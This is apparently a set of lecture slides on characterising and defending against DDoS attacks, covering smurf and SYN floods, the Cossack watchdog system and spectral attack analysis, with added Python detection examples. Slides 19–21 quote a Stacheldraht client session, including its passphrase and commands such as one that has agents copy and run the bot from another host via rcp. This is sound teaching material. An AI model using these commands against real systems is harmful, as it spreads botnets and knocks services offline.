
Characterizing and Defending Against DDoS Attacks Christos Papadopoulos..and many others.



2 Characterizing and Defending Against DDoS Attacks Christos Papadopoulos..and many others

3 How Do Computers Find Each Other?
(figure: Computer 1 and Computer 2 connected through the Internet)

4 What Are the Different Kinds of Addresses?
• Have domain name (e.g., www.usc.edu)
  – Global, human readable name
• DNS translates name to IP address (e.g., 128.125.19.146)
  – Global, understood by all networks
• Finally, we need local net address
  – e.g., Ethernet (08-00-2c-19-dc-45)
  – Local, works only on a particular network

5 Domain Naming System (DNS)
Computer 1 → local DNS server: "What's the IP address for www.usc.edu?"
Local DNS server → Computer 1: "It is 128.125.19.146"
(DNS server address manually configured into the OS)

6 Finding Ether Address: Address Resolution (ARP)
Ethernet broadcast: "Who knows the Ethernet address for 128.125.51.41?"
Ethernet broadcast: "I do, it is 08-00-2c-19-dc-45"

7 Sending a Packet Through the Internet
(figure: hosts H attached to a mesh of routers R; H: Hosts, R: Routers)
Routers send the packet to the next closest point.
The Internet routes packets based on their destination!

8 Smurf Attack
(figure: attacker, amplifier network, target)
• The attacker sends a broadcast echo request to the amplifier network; the source address is spoofed to be the target's address.
• Many echo replies are received by the target, since most machines on the amplifier network respond to the broadcast.

9 TCP SYN Flooding - A more powerful attack -
Normal handshake, client (port = 33623/tcp) and server (port = 23/tcp):
  client → server: SYN
  server → client: SYN-ACK
  client → server: ACK
  [session proceeds] [ACK set for remainder of session]
Attack, target (port = 23/tcp) and a nonexistent host:
  attacker → target: SPOOFED SYN (source = nonexistent host)
  target → nonexistent host: SYN-ACK
  FINAL ACK NEVER SENT
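The two attacks on slides 8 and 9 leave distinct traces on the victim's side: a pile of half-open TCP handshakes, and ICMP echo replies fanning in from one amplifier network. The Python below is an added example, not code from the presentation or from the Cossack project, of the checks a monitor could run over captured packets to surface both. The packet records, the TEST-NET addresses, the /24 amplifier prefix and the alert cut-offs are all constructed assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network


# Constructed packet records, not a real capture: (src, dst, proto, detail).
# For TCP, detail is the flag combination; for ICMP it is the message type.
def build_sample_packets():
    pkts = []
    # Legitimate telnet handshake (slide 9, left): SYN, SYN-ACK, ACK
    pkts.append(("10.0.0.5", "10.0.0.20", "tcp", "SYN"))
    pkts.append(("10.0.0.20", "10.0.0.5", "tcp", "SYN-ACK"))
    pkts.append(("10.0.0.5", "10.0.0.20", "tcp", "ACK"))
    # SYN flood (slide 9, right): 200 SYNs from spoofed, nonexistent sources;
    # the server answers each with a SYN-ACK but the final ACK never arrives
    for i in range(200):
        spoofed = f"203.0.113.{i + 1}"
        pkts.append((spoofed, "10.0.0.20", "tcp", "SYN"))
        pkts.append(("10.0.0.20", spoofed, "tcp", "SYN-ACK"))
    # Smurf (slide 8): one echo request to the amplifier's broadcast address
    # carrying the target's address as source, then 50 replies hit the target
    pkts.append(("192.0.2.10", "198.51.100.255", "icmp", "echo-request"))
    for i in range(1, 51):
        pkts.append((f"198.51.100.{i}", "192.0.2.10", "icmp", "echo-reply"))
    return pkts


def half_open_by_server(packets):
    """Connections that reached SYN-ACK but never received the client's ACK,
    counted per server. Each entry is server state the sender tied up
    without owning a real host (the 'State' resource on slide 10)."""
    pending = set()                      # (client, server) awaiting final ACK
    for src, dst, proto, detail in packets:
        if proto != "tcp":
            continue
        if detail == "SYN-ACK":
            pending.add((dst, src))      # server src replied to client dst
        elif detail == "ACK":
            pending.discard((src, dst))  # handshake completed normally
    counts = defaultdict(int)
    for _client, server in pending:
        counts[server] += 1
    return dict(counts)


def syn_flood_alerts(packets, max_half_open=50):  # cut-off is an assumption
    """Servers whose half-open backlog exceeds what normal clients produce."""
    return {srv: n for srv, n in half_open_by_server(packets).items()
            if n > max_half_open}


def smurf_indicators(packets, min_repliers=10):  # cut-off is an assumption
    """Two signatures of the slide-8 attack: echo requests addressed to a
    subnet broadcast address (assumed /24 prefixes), and echo replies from
    many hosts of one /24 converging on a single destination."""
    broadcast_requests = []
    repliers = defaultdict(set)          # (target, amplifier /24) -> hosts
    for src, dst, proto, detail in packets:
        if proto != "icmp":
            continue
        if detail == "echo-request":
            dst_net = ip_network(f"{dst}/24", strict=False)
            if ip_address(dst) == dst_net.broadcast_address:
                broadcast_requests.append((src, dst))
        elif detail == "echo-reply":
            src_net = str(ip_network(f"{src}/24", strict=False))
            repliers[(dst, src_net)].add(src)
    amplified = {key: len(hosts) for key, hosts in repliers.items()
                 if len(hosts) >= min_repliers}
    return broadcast_requests, amplified


if __name__ == "__main__":
    sample = build_sample_packets()
    print("half-open per server:", half_open_by_server(sample))
    print("SYN flood alerts:", syn_flood_alerts(sample))
    print("smurf indicators:", smurf_indicators(sample))
```

The half-open count keys on the server's SYN-ACK rather than on the client's SYN, because the SYN-ACK is the moment the server commits state; on a real sensor the pending set would also need an ageing timer so that slow but honest clients are not counted forever. The smurf check groups repliers by /24 only because that is the constructed amplifier's size; the prefix length is a parameter to tune per site.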

10 So, What Is DDoS?
Distributed Denial of Service
• New, more pernicious type of attack
• Many hosts “gang” up to attack another host
• Network resource attack:
  – Bandwidth
  – State

11 Why Should We Care?
• Successfully used to attack prominent sites in the Internet by those with a primitive understanding of internet protocols
• It is relatively easy to do, but hard to detect and stop
• It is only going to get worse unless we develop adequate protection mechanisms

12 Anatomy of an Attack
• Compromise a large set of machines
• Install attack tools
• Instruct all attack machines to initiate attack against a victim
Process highly automated

13 Phase 1: Compromise A (stolen) account is used as repository for attack tools. A scan is performed to identify potential victims. A script is used to compromise the victims.

14 Phase 2: Install Attack Tools An automated installation script is then run on the “owned” systems to download and install the attack tool(s) from the repository. Optionally, a “root kit” is installed on the compromised systems.

15 Phase 3: Launch attack Launch a coordinated DDoS from different sites against a single victim. Network pipes of attackers can be small, but the aggregate bandwidth is far larger than the victim’s pipe. The victim’s ISP may not notice the elevated traffic. DDoS attacks are harder to track than a DoS.


17 Some Known DDoS attack tools
• Trin00
• Tribal Flood Network (TFN)
• Tribal Flood Network 2000 (TFN2K)
• Stacheldraht

18 Stacheldraht
• Combines features of trin00 and TFN.
• Adds encryption between the attacker and masters and automated update of agents.
• Communication between attacker and masters takes place on tcp port 16660.
• Daemons receive commands from masters through ICMP echo replies.
• ICMP, UDP, SYN flood and SMURF attack.

19
# ./client 192.168.0.1
[*] stacheldraht [*]
(c) in 1999 by...
trying to connect...
connection established.
--------------------------------------
enter the passphrase : sicken
--------------------------------------
entering interactive session.
******************************
welcome to stacheldraht
******************************
type .help if you are lame
stacheldraht(status: a!1 d!0)>

20
stacheldraht(status: a!1 d!0)> .help
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping .madd .mlist .msadd .msrem .distro .help .setusize .setisize .mdie .sprange .mstop .killall .showdead .showalive
--------------------------------------------------
stacheldraht(status: a!1 d!0)>

21 Some Commands
.distro user server   Instructs the agent to install and run a new copy of itself using the Berkeley "rcp" command, on the system "server", using the account "user" (e.g., "rcp user@server:linux.bin ttymon").
.madd ip1[:ip2[:ipN]]   Add IP addresses to list of attack victims.
.mdie   Sends die request to all agents.

22 COSSACK: Coordinated Suppression of Simultaneous Attacks
Computer Networks Division, ISI
http://www.isi.edu/cossack

23 People
• Co-PIs: Christos Papadopoulos, Bob Lindell (USC/ISI)
• Affiliations: Ramesh Govindan (USC/ISI)
• Staff: John Mehringer (ISI)
• Students: Alefiya Hussain (USC)
• DARPA synergies:
  – DWARD - Peter Reiher, Jelena Mirkovic (UCLA)
  – SAMAN - John Heidemann (USC/ISI)

24 Cossack Overview
• Distributed set of watchdogs at network perimeter
  – Local IDS
  – Group communication
  – Topology information (when available)
• Fully distributed approach
  – Peer-to-peer rather than master-slave
• Attack-driven dynamic grouping of watchdogs
• Attack correlation via coordination with other watchdogs
• Independent, selective deployment of countermeasures

25 Cossack: A Simplified View
(figure: watchdogs W at the network perimeter, a target and an attacker)

26 Attacks Begin
(figure: watchdogs W, target, attacker)

27 Watchdogs Communicate Using YOID
(figure: watchdogs W, target, attacker, YOID multicast group)

28 Attacks Detected
(figure: watchdogs W, target, attacker, YOID)

29 Watchdogs Install Filters and Eliminate Attack
(figure: watchdogs W, target, attacker)

30 Detecting Source Spoofed Attacks
(figure: watchdogs W, target, attacker, YOID)

31 Cossack Watchdog Architecture
(figure: components) Yoid Multicast Interface (YOID multicast group), Distributed Blackboard, Snort Interface, Rate Monitor, Other IDS (D-WARD), Router Control, Pulsing Detector, Cisco Interface, Linux IPTables Router Interface, Event Monitor

32 Cossack Plugin Operation
(figure: same components as slide 31) Packet flow statistics arrive as packet averages grouped by destination address; the watchdog can request more stats.

33 Cossack Plugin Operation
(figure: same components as slide 31) After the request for more stats, packet averages grouped by source address are delivered as well.
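Slides 32 and 33 describe a two-stage monitor: the watchdog first sees only packet averages grouped by destination, and only when a destination's rate looks abnormal does it ask for the per-source breakdown. The Python below is an added example of that cycle, written for this page and not taken from the Cossack software; the flow records, the 2000 pps threshold (slide 34 says the real thresholds come from the Network Inspector) and the ten-source cut-off between single- and multi-source are constructed assumptions.

```python
from collections import defaultdict


# Constructed flow statistics, not Cossack output: (t_ms, src, dst, packets)
def build_sample_flows():
    flows = []
    for tick in range(10):                  # ten 100 ms reporting intervals
        t = tick * 100
        for i in range(3):                  # ordinary traffic to one server
            flows.append((t, f"10.0.{i}.7", "192.0.2.20", 10))
        for i in range(40):                 # 40 attack sources, one target
            flows.append((t, f"203.0.113.{i + 1}", "192.0.2.10", 20))
    return flows


def rate_by_destination(flows, window_ms=1000):
    """Stage 1 (slide 32): packets per second grouped by destination only,
    the cheap statistic the watchdog receives all the time."""
    totals = defaultdict(int)
    for _t, _src, dst, pkts in flows:
        totals[dst] += pkts
    return {dst: n * 1000 / window_ms for dst, n in totals.items()}


def rate_by_source(flows, dst, window_ms=1000):
    """Stage 2 (slide 33): the follow-up 'request for more stats', issued
    only for a destination whose aggregate rate crossed the threshold."""
    totals = defaultdict(int)
    for _t, src, d, pkts in flows:
        if d == dst:
            totals[src] += pkts
    return {src: n * 1000 / window_ms for src, n in totals.items()}


def watchdog_cycle(flows, threshold_pps=2000, window_ms=1000):
    """One monitoring cycle. Returns, per flagged destination, the figures a
    watchdog would post to the distributed blackboard for correlation with
    its peers: rate, number of sources, a coarse kind, and the top senders."""
    events = {}
    for dst, pps in rate_by_destination(flows, window_ms).items():
        if pps <= threshold_pps:
            continue
        per_src = rate_by_source(flows, dst, window_ms)
        ranked = sorted(per_src.items(), key=lambda kv: kv[1], reverse=True)
        events[dst] = {
            "pps": pps,
            "sources": len(per_src),
            # assumed cut-off; spoofed sources make this count unreliable
            "kind": "multi-source" if len(per_src) >= 10 else "single-source",
            "top_sources": [src for src, _ in ranked[:5]],
        }
    return events


if __name__ == "__main__":
    for dst, ev in watchdog_cycle(build_sample_flows()).items():
        print(dst, ev)
```

The per-source breakdown is what lets a watchdog near the attacker pick a filter that removes the attack without touching other traffic (slide 29); when the source addresses are spoofed the second stage says little on its own, which is why slide 30 has the watchdogs correlate their observations over YOID instead of trusting any single vantage point.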

34 Cossack Network Inspector
Tool to determine detection thresholds for watchdogs
• Interfaces with the Cossack Snort Plugin
• Collects aggregate level network traffic statistics
  – Traffic filters created using snort rules

35 Cossack Performance
• Response time: 5 – 30 seconds
• Insensitive to attack type

36 Attack Capture and Analysis
Goal: Capture some attacks, analyze and learn from them
• Packet-level capture facilities in several sites:
  – Los Nettos
  – USC
  – CAIDA
  – [Telcordia, Sprint]
• Spectral analysis

37 Tracing Infrastructure
(figure labels: Los Nettos trace machine, 140 Mbps, 38 kpps; Internet: LA-MAE, Verio, Cogent, Genuity; Los Nettos customers: JPL, Caltech, TRW, USC, Centergate)

38 Captured Attacks
• Captured and classified about 120 attacks over several months
Attack class     Count   PPS            Kbps
Single-source    37      133-1360       640-2260
Multi-source     10      16000-98000    13000-46000
Reflected        20      1300-3700      1700-3000
Unclassified     13      550-33500      1600-16000

39 Spectral Attack Analysis
(figure: Normalized Cumulative Spectrum (NCS) with F(60%) marked)
• Multi-source attack (145 sources): localization of power in low frequencies in the NCS
• Single-source attack: strong higher frequencies and a linear NCS

40 Spectral Analysis
Goal: identify single vs. multi-source attacks
• Single-source: F(60%) mean 268Hz (240-295Hz)
• Multi-source: F(60%) mean 172Hz (142-210Hz)
• Able to robustly categorize unclassified attacks
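Slides 39 and 40 rest on one computation: turn the packet arrival series into a power spectrum, accumulate it into the Normalized Cumulative Spectrum (NCS), and read off F(60%), the frequency at which the NCS first reaches 60%. The Python below is an added example of that computation, written for this page rather than taken from the Cossack analysis code. The two traffic series are constructed stand-ins (one attacker sending a packet every 3 ms; twenty attackers each bursting on and off at their own slow cycle), the 1 ms bin size, the mean removal before the DFT and the 220 Hz decision cut-off (roughly midway between the two means on slide 40) are this example's assumptions, and the measured ranges on slide 40 come from real captures, not from this code.

```python
import cmath
import math

FS_HZ = 1000   # 1 ms bins, so the one-sided spectrum covers 0..500 Hz
N = 1200       # 1.2 s of arrivals per series


def single_source_series():
    """Constructed stand-in for one attacker: one packet every 3 ms."""
    return [1.0 if n % 3 == 0 else 0.0 for n in range(N)]


def multi_source_series(sources=20):
    """Constructed stand-in for many attackers: each sends one packet per ms
    during the 'on' half of its own 40..116 ms on/off cycle, so the aggregate
    rate at the target wanders slowly instead of ticking at one frequency."""
    series = [0.0] * N
    for i in range(sources):
        period, offset = 40 + 4 * i, 7 * i
        for n in range(N):
            if ((n + offset) % period) < period // 2:
                series[n] += 1.0
    return series


def one_sided_power(x):
    """Power spectrum for bins 0..N/2 by direct DFT (no numpy needed).
    The mean is removed first so the DC term does not swamp the NCS;
    that is this example's choice, the slides do not say."""
    n = len(x)
    mean = sum(x) / n
    xc = [v - mean for v in x]
    twiddle = [cmath.exp(-2j * math.pi * m / n) for m in range(n)]
    power = []
    for k in range(n // 2 + 1):
        acc = 0j
        for t, v in enumerate(xc):
            acc += v * twiddle[(k * t) % n]
        power.append(abs(acc) ** 2)
    return power


def ncs(power):
    """Normalized Cumulative Spectrum: running sum of power, scaled to 1."""
    total = sum(power)
    running, out = 0.0, []
    for p in power:
        running += p
        out.append(running / total)
    return out


def f_at(power, fraction=0.6, fs=FS_HZ, n=N):
    """F(60%) by default: frequency of the first bin whose NCS >= fraction."""
    for k, c in enumerate(ncs(power)):
        if c >= fraction:
            return k * fs / n
    return None


def classify(series, cutoff_hz=220):   # cut-off is an assumption, see above
    """Return (F(60%), label) for an arrival series."""
    f60 = f_at(one_sided_power(series))
    return f60, ("single-source" if f60 > cutoff_hz else "multi-source")


if __name__ == "__main__":
    print("single attacker:", classify(single_source_series()))
    print("20 attackers:   ", classify(multi_source_series()))
```

With the mean removed, the single attacker's series has all of its power at its 333 Hz packet rate (and its aliased harmonics), so the NCS jumps straight to 100% there and F(60%) lands high; the aggregate of twenty slow on/off senders puts most of its power below 30 Hz, so F(60%) lands low. The direct DFT is O(N²) and fine for a 1200-sample window; a production tool would use an FFT over a longer capture.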

41 Conclusions
• Cossack is a fully distributed approach against DDoS attacks
• Software is operational and currently undergoing Red Team testing
• We continue to capture attacks, analyze and learn from them
• Spectral analysis work very promising
http://www.isi.edu/cossack

